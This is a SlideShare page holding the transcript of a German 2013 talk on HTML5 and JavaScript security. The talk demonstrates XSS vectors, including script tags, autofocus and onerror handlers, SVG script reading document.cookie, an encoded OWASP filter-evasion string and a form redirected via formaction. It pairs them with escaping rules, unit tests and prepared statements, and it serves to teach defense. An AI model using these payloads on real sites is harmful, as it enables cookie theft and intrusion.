• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
2013 05-03 -  HTML5 & JavaScript Security
 

2013 05-03 - HTML5 & JavaScript Security

on

  • 741 views

INTERAKTIVE SLIDES: ...

INTERAKTIVE SLIDES:
http://johanneshoppe.github.com/HTML5Security/

Sie kennen die bekannten Angriffsvektoren wie SQL-Injections oder XSS. Ihre Anwendung ist sicher. Ist Sie das wirklich? Auch wenn Sie in Ihrer Webanwendung kein HTML5 einsetzen, die Browser sind bereit! Kennen Sie alle neuen Markups? Haben Sie bereits die Potentiale von Cross Origin Requests, WebSockets oder Local Storage auf dem Radar? Lernen Sie neue Gefahrenpotentiale kennen, die durch die Unterstützung von HTML5 und dessen APIs entstanden sind.

Statistics

Views

Total Views
741
Views on SlideShare
741
Embed Views
0

Actions

Likes
0
Downloads
7
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    2013 05-03 -  HTML5 & JavaScript Security 2013 05-03 - HTML5 & JavaScript Security Presentation Transcript

    • SecurityCreated by Johannes Hoppe
    • ZielAngriffsvektoren aufzeigen.Strategien besprechen.Mehr nicht!
    • FeaturesNeue Angriffsvektoren
    • Ein FormularUsername:Password:Login<form id="login" action="#">Username: <input type="text" name="username">Password: <input type="password" name="password"><input type="submit" value="Login"></form>
    • FormactionUsername:Password:LoginKlick mich!<form id="login" action="#">Username: <input type="text" name="username">Password: <input type="password" name="password"><input type="submit" value="Login"></form><button type="submit" form="login" formaction="http://example.org">Klick mich!</button>
    • SVGPresto, WebKit, Gecko und sogar Trident 9<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" width="40" height="40"><circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/><circle cx="15" cy="15" r="2" fill="black" stroke="black"/><circle cx="25" cy="15" r="2" fill="black" stroke="black"/><path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2"/></svg>
    • SVGkann JavaScript enthalten!Test<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" width="200" height="50"><defs><style> </style></defs><circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/><circle cx="15" cy="15" r="2" fill="black" stroke="black"/><circle cx="25" cy="15" r="2" fill="black" stroke="black"/><path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2" transform="rotate(180, 20, 28)"/><text x="11" y="50" id="display">Test</text><script></script></svg><![CDATA[ text { font-size:6pt; } ]]>alert(document.cookie);document.getElementById(display).textContent = document.cookie;
    • Business as usualHTML5 es ist auch nicht schlimmer als HTML 4» http://html5sec.org
    • XSSEingeschleuster JavaScript-Code
    • Oldies but Goldiesindex.html?message=Daten gespeichertindex.html?message=<script>alert(XSS)</script><script>var message = $.url().param(message);if (message) {Notifier.success(message);}</script>
    • Eval everywhereEval is evil» Demo<!-- Self-executing onFocus event via autoFocus --><input onfocus="alert(XSS onfocus)" autofocus><!-- Video OnError --><video><source onerror="javascript:alert(XSS onerror)"></video><!-- Presto only: Form surveillance --><form id=test onforminput=alert(XSS onforminput)><input></form><button form=test onformchange=alert(XSS onformchange)>X</button>1 2 3
    • OWASPOpen Web Application Security ProjectXSS Filter Evasion Cheat Sheet<!-- Long UTF-8 Unicode encoding without semicolons --><IMG SRC="&#34&#32&#111&#110&#101&#114&#114&#111&#114&#61&#34&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">» Old IE Demo
    • XSS Vorbeugen
    • 1.Hier sollten dynamischeDaten niemals verwendet werden<script> </script><!-- HIER --><div HIER="test"/><HIER href="test" /><style> </style>HIERHIER
    • 2.HTML escapedynamic data& → &amp;< → &lt;> → &gt;" → &quot; → &apos; / &#39;<div>HTML ESCAPE</div>
    • Testen?function htmlEncode(input) {// jquery.text == document.createTextNodereturn ($(<div/>).text(input).html());}var saveFormat = function () {var args = Array.prototype.slice.call(arguments);var txt = args.shift();$.each(args, function (i, item) {item = htmlEncode(item);txt = txt.replace("{" + i + "}", item);});return txt;};
    • Testen!describe("saveFormat", function () {var original = {0} - {1} - {2};it("should replace placeholders", function () {var expected = A - B - C;var formated = saveFormat(original, A, B, C);expect(formated).toEqual(expected);});it("should encode injected content", function () {var expected = A - &lt;b&gt;TEST&lt;/b&gt; - C;var formated = saveFormat(original, A, <b>TEST</b>, C);expect(formated).toEqual(expected);});});
    • Testfinished in 0.007s••No try/catchJasmine 1.3.1 revision 1354556913Passing2specssaveFormatshould replace placeholdersshould encode injected content» Demo
    • Moment...describe("saveFormat", function () {var original = <a title="{0}">Test</a>;it("should replace quotes", function () {var expected = <a title="&quot;">Test</a>;var formated = saveFormat(original, ");expect(formated).toEqual(expected);});});
    • Richtig testen!finished in 0.006sxNo try/catchJasmine 1.3.1 revision 1354556913Failing1spec1spec|1 failingsaveFormat should replace quotes.Expected <a title=""">Test</a> to equal <atitle="&quot;">Test</a>.Error: Expected <a title=""">Test</a> to equal <a title="&quot;">Test</a>.at new jasmine.ExpectationResult (http://localhost:1332/examples/jasmine/lib/jat null.toEqual (http://localhost:1332/examples/jasmine/lib/jasmine-1.3.1/jasmat null.<anonymous> (http://localhost:1332/examples/jasmine-demo2/saveFormat.sat jasmine.Block.execute (http://localhost:1332/examples/jasmine/lib/jasmine-1at jasmine.Queue.next_ (http://localhost:1332/examples/jasmine/lib/jasmine-1.3» Demo
    • 3.Attribute escapedynamic dataa-z A-Z 0-9 → immun, . - _ → immunRest → &#xHH;<div attr="ATTRIBUTE ESCAPE"></div><!-- NIEMALS ohne quotes! --><div attr=ATTRIBUTE ESCAPE></div>
    • 4. DO NOTJavaScript escapedynamic dataHTML parser runs before the JavaScript parser!you are doing it wrong
    • Das hier ist AlltagUserList.cshtml / Kendo UI Template# if(ID != 0) { #<a href="javascript:DialogManager.ShowPartialDialog(@Url.Action("UserManagement", "Management"), { userId : #= htmlEncode(ID) # }, {title:#= htmlEncode(Alias) #})"#= htmlEncode(Alias) #</a># } else { ##= htmlEncode(Alias) ## } #
    • ?Offensichtlich läuft beim Umgangmit Daten etwas prinzipiell falsch!
    • Storage
    • Egalob Cookiesob Session Storageob Local Storageob WebSQLdie Daten sind nicht vertrauenswürdig!
    • Resident XSSrichtig fies!
    • Vertraulichen Informationengehören in die SERVER-Session!
    • Session Storage bevorzugen!
    • WebSQLSQL Injection:Prepared Statement:executeSql("SELECT foo FROM bar WHERE value=" + value);executeSql("SELECT foo FROM bar WHERE value=?", [value]);
    • Kommunikation
    • Mashups!define([jquery, knockout,knockout.mapping, domReady!], function ($, ko, mapping) {var url =http://search.twitter.com/search.json?q=%23xss&callback=?;$.getJSON(url).done(function (data) {var viewModel = mapping.fromJS(data);ko.applyBindings(viewModel, $(#tweets).get(0));});});
    • Loading...
    • JSONJSON with Padding{"hello": "world"}<script></script><script src="http://search.twitter.com/search.json?q=%23dnc13&callback=foo"></script>var foo = function(json) {$(#output).text(JSON.stringify(json, undefined, 2));};foo({"hello": "world"});» Demo
    • JSONP
    • SOPSame origin policy → Not macht erfinderisch (JSONP)CORSCross-Origin Resource Sharing → Access-Control-Allow-Origin: *WebSocketsdo what you want
    • JS-ReconShell of the Future
    • Intranet == Internet
    • Danke!
    • » Sicherheit von Web-Anwendungen